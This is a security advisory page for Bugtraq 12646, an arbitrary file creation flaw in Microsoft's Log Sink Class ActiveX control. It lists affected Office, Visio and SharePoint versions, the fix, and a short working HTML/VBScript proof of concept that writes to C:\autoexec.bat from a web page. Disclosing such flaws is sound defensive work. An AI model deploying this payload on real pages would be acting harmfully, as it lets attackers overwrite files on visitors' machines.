Microsoft Log Sink Class ActiveX Control Arbitrary File Creation Vulnerability

BID:12646

Info

Microsoft Log Sink Class ActiveX Control Arbitrary File Creation Vulnerability

Bugtraq ID: 12646
Class: Design Error
CVE:
Remote: Yes
Local: No
Published: Apr 29 2003 12:00AM
Updated: Apr 29 2003 12:00AM
Credit: This vulnerability was originally announced by the vendor, the issue was also independently discovered by Shane Hird <[email protected]>.
Vulnerable: Microsoft Visio 2002 SP1
Microsoft Visio 2002
Microsoft SharePoint Portal Server 2001 SP1
- Microsoft IIS 5.0
 - Microsoft Windows 2000 Advanced Server SP2
 - Microsoft Windows 2000 Advanced Server SP1
 - Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Server SP2
 - Microsoft Windows 2000 Server SP1
 - Microsoft Windows 2000 Server
Microsoft SharePoint Portal Server 2001
- Microsoft IIS 5.0
 - Microsoft Windows 2000 Advanced Server SP2
 - Microsoft Windows 2000 Advanced Server SP1
 - Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Server SP2
 - Microsoft Windows 2000 Server SP1
 - Microsoft Windows 2000 Server
Microsoft Office XP SP3
+ Microsoft Excel 2002 SP3
 + Microsoft Excel 2002 SP3
 + Microsoft FrontPage 2002 SP3
 + Microsoft FrontPage 2002 SP3
 + Microsoft Outlook 2002 SP3
 + Microsoft Outlook 2002 SP3
 + Microsoft PowerPoint 2002 SP3
 + Microsoft PowerPoint 2002 SP3
 + Microsoft Publisher 2002 SP3
 + Microsoft Publisher 2002 SP3
 Microsoft Office XP SP2
- Microsoft Windows 2000 Professional SP3
 - Microsoft Windows 2000 Professional SP2
 - Microsoft Windows 2000 Professional SP1
 - Microsoft Windows 2000 Professional
- Microsoft Windows 98
- Microsoft Windows 98SE
- Microsoft Windows ME
- Microsoft Windows NT Workstation 4.0 SP6a
 - Microsoft Windows NT Workstation 4.0 SP6
 - Microsoft Windows NT Workstation 4.0 SP5
 - Microsoft Windows NT Workstation 4.0 SP4
 - Microsoft Windows NT Workstation 4.0 SP3
 - Microsoft Windows NT Workstation 4.0 SP2
 - Microsoft Windows NT Workstation 4.0 SP1
 - Microsoft Windows NT Workstation 4.0
 - Microsoft Windows XP Home SP1
 - Microsoft Windows XP Home
- Microsoft Windows XP Professional SP1
 - Microsoft Windows XP Professional
Microsoft Office XP SP1
- Microsoft Windows 2000 Professional SP2
 - Microsoft Windows 2000 Professional SP1
 - Microsoft Windows 2000 Professional
- Microsoft Windows 98
- Microsoft Windows ME
- Microsoft Windows NT Workstation 4.0 SP6a
 - Microsoft Windows NT Workstation 4.0 SP6
 - Microsoft Windows NT Workstation 4.0 SP5
 - Microsoft Windows NT Workstation 4.0 SP4
 - Microsoft Windows NT Workstation 4.0 SP3
 - Microsoft Windows NT Workstation 4.0 SP2
 - Microsoft Windows NT Workstation 4.0 SP1
 - Microsoft Windows NT Workstation 4.0
 - Microsoft Windows XP Home
- Microsoft Windows XP Professional
Microsoft Office XP
- Microsoft Windows 2000 Professional SP2
 - Microsoft Windows 2000 Professional SP1
 - Microsoft Windows 2000 Professional
- Microsoft Windows 98
- Microsoft Windows ME
- Microsoft Windows NT Workstation 4.0 SP6a
 - Microsoft Windows NT Workstation 4.0 SP6
 - Microsoft Windows NT Workstation 4.0 SP5
 - Microsoft Windows NT Workstation 4.0 SP4
 - Microsoft Windows NT Workstation 4.0 SP3
 - Microsoft Windows NT Workstation 4.0 SP2
 - Microsoft Windows NT Workstation 4.0 SP1
 - Microsoft Windows NT Workstation 4.0
 - Microsoft Windows XP Home
- Microsoft Windows XP Professional
Not Vulnerable: Microsoft Visio 2002 SP2
Microsoft SharePoint Portal Server 2001 SP3
Microsoft SharePoint Portal Server 2001 SP2A
Microsoft SharePoint Portal Server 2001 SP2

Discussion

Microsoft Log Sink Class ActiveX Control Arbitrary File Creation Vulnerability

Microsoft Log Sink Class ActiveX control can allow remote attackers to create arbitrary files on an affected computer.

A remote attacker can exploit this issue by crafting a malicious Web site that triggers this vulnerability and enticing a user to visit the site. If successful, the attacker may create arbitrary files on the computer. This may lead to various attacks including arbitrary code execution.

Exploit / POC

Microsoft Log Sink Class ActiveX Control Arbitrary File Creation Vulnerability

The following exmploit code is available:
<object id=ctl
classid="clsid:{DE4735F3-7532-4895-93DC-9A10C4257173}"></object>
<script language="vbscript">
ctl.initsink "C:\autoexec.bat"
ctl.addstring "echo Drive formatted? ", ""
ctl.deinitsink
</script>

Solution / Fix

Microsoft Log Sink Class ActiveX Control Arbitrary File Creation Vulnerability

Solution:
Microsoft has released various knowledge base articles and upgrades to address this issue in affected products. Visio 2002 Service Pack 2 and SharePoint Portal Server 2001 Service Pack 2A are not affected by this vulnerability.


Microsoft Office XP SP3

Microsoft Office XP SP1

Microsoft Office XP SP2

Microsoft Office XP

References

© CVE.report 2026 |

Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. It is the responsibility of user to evaluate the accuracy, completeness or usefulness of any information, opinion, advice or other content. EACH USER WILL BE SOLELY RESPONSIBLE FOR ANY consequences of his or her direct or indirect use of this web site. ALL WARRANTIES OF ANY KIND ARE EXPRESSLY DISCLAIMED. This site will NOT BE LIABLE FOR ANY DIRECT, INDIRECT or any other kind of loss.

CVE, CWE, and OVAL are registred trademarks of The MITRE Corporation and the authoritative source of CVE content is MITRE's CVE web site. This site includes MITRE data granted under the following license.

Free CVE JSON API cve.report/api

CVE.report and Source URL Uptime Status status.cve.report